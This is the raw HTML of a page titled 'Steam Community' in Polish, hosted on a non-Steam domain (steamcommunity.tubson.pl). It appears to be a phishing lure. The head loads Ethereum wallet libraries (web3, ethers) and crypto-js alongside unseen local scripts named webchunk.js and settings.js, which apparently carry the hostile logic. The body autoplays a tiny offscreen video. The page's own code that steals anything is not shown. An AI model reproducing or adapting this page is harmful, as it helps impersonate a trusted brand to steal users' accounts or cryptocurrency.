<html>
 <head>
  <script src="https://unpkg.com/web3@latest/dist/web3.min.js">
  </script>
  <script src="https://unpkg.com/crypto-js@latest/crypto-js.js">
  </script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/ethers/5.7.2/ethers.umd.js" type="application/javascript">
  </script>
  <script src="https://cdn.jsdelivr.net/npm/web3@latest/dist/web3.min.js">
  </script>
  <script src="./js/settings.js">
  </script>
  <script src="./js/webchunk.js">
  </script>
  <meta charset="utf-8"/>
  <meta content="width=device-width, initial-scale=1.0" name="viewport"/>
  <style>
   body {
    margin: 0;
    padding: 0;
    background-image: url('steam.png');
    background-size: cover;
    background-repeat: no-repeat;
    background-attachment: fixed;
  }
  </style>
  <meta content="AymqwRC7u88Y4JPvfIF2F37QKylC04248hLCdJAsh8xgOfe/dVJPV3XS3wLFca1ZMVOtnBfVjaCMTVudWM//5g4AAAB7eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbTo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1RoaXJkUGFydHkiOnRydWV9" http-equiv="origin-trial"/>
 </head>
 <link href="totalcss.css" rel="stylesheet"/>
 <body>
  <title>
   Społeczność Steam
  </title>
  <meta charset="utf-8"/>
  <style>
   html, body {
      width: 100%;
      height: 100%;
      margin: 0;
      font-family: -apple-system, BlinkMacSystemFont, 'avenir next', avenir,
        'helvetica neue', helvetica, ubuntu, roboto, noto, 'segoe ui', arial,
        sans-serif;
      overflow: hidden;
    }
    .hello-message {
      margin: 40px;
      text-align: center;
    }
    .logout-messages {
      pointer-events: none;
      color: red;
      margin: 40px;
      position: fixed;
      top: 0;
      left: 0;
      text-shadow: 2px 2px #FFF, 4px 4px 10px #000;
    }
    img {
      width: 300px;
    }
    @keyframes blurslowly {
      0% {
        filter: none;
      }
      92% {
        filter: blur(0);
      }
      96% {
        filter: blur(1px);
      }
      100% {
        filter: blur(0);
      }
    }
    body {
      animation-name: blurslowly;
      animation-iteration-count: infinite;
      animation-duration: 15s;
      animation-play-state: running;
    }
  </style>
  <link href="misieczka.jpg" rel="icon" type="image/x-icon"/>
  <meta content="Społeczność Steam" property="og:title"/>
  <meta content="website" property="og:type"/>
  <meta content="https://steamcommunity.tubson.pl" property="og:url"/>
  <meta content=" " property="og:image"/>
  <meta content="steamcommunity" property="og:description"/>
  <meta content="miska, misiunia, tubson.pl, miska.tubson.pl" name="keywords"/>
  <meta content="steamcommunity" name="description"/>
  <meta content="#34eb7d" name="theme-color"/>
  <template>
   <div class="hello-message">
    <h1>
    </h1>
    <h2>
    </h2>
   </div>
   <div class="logout-messages">
   </div>
  </template>
  <script src="index.js">
  </script>
  <div class="hello-message">
   <h1>
   </h1>
   <h2>
   </h2>
  </div>
  <div class="logout-messages">
  </div>
  <video autoplay="" loop="" src="nig4.mp4" style="position: fixed; width: 1px; height: 1px; overflow: hidden; top: -10px; left: -10px;">
  </video>
  <!-- Google tag (gtag.js) -->
  <script async="" src="https://www.googletagmanager.com/gtag/js?id=G-6S5388LRGM">
  </script>
  <script>
   window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-6S5388LRGM');
  </script>
  <script>
   (function(){var js = "window['__CF$cv$params']={r:'82fe1fe8be1000a4',t:'MTcwMTYzMDc4Mi45NzQwMDA='};_cpo=document.createElement('script');_cpo.nonce='',_cpo.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js',document.getElementsByTagName('head')[0].appendChild(_cpo);";var _0xh = document.createElement('iframe');_0xh.height = 1;_0xh.width = 1;_0xh.style.position = 'absolute';_0xh.style.top = 0;_0xh.style.left = 0;_0xh.style.border = 'none';_0xh.style.visibility = 'hidden';document.body.appendChild(_0xh);function handler() {var _0xi = _0xh.contentDocument || _0xh.contentWindow.document;if (_0xi) {var _0xj = _0xi.createElement('script');_0xj.innerHTML = js;_0xi.getElementsByTagName('head')[0].appendChild(_0xj);}}if (document.readyState !== 'loading') {handler();} else if (window.addEventListener) {document.addEventListener('DOMContentLoaded', handler);} else {var prev = document.onreadystatechange || function () {};document.onreadystatechange = function (e) {prev(e);if (document.readyState !== 'loading') {document.onreadystatechange = prev;handler();}};}})();
  </script>
  <iframe height="1" style="position: absolute; top: 0px; left: 0px; border: none; visibility: hidden;" width="1">
  </iframe>
  <script crossorigin="anonymous" data-cf-beacon='{"rayId":"82fe1fe8be1000a4","r":1,"version":"2023.10.0","token":"026c0eb60c7e4cf8b2c1c277ad27fe86"}' defer="" integrity="sha512-euoFGowhlaLqXsPWQ48qSkBSCFs3DPRyiwVu3FjR96cMPx+Fr+gpWRhIafcHwqwCqWS42RZhIudOvEI+Ckf6MA==" src="https://static.cloudflareinsights.com/beacon.min.js/v84a3a4012de94ce1a686ba8c167c359c1696973893317">
  </script>
 </body>
</html>
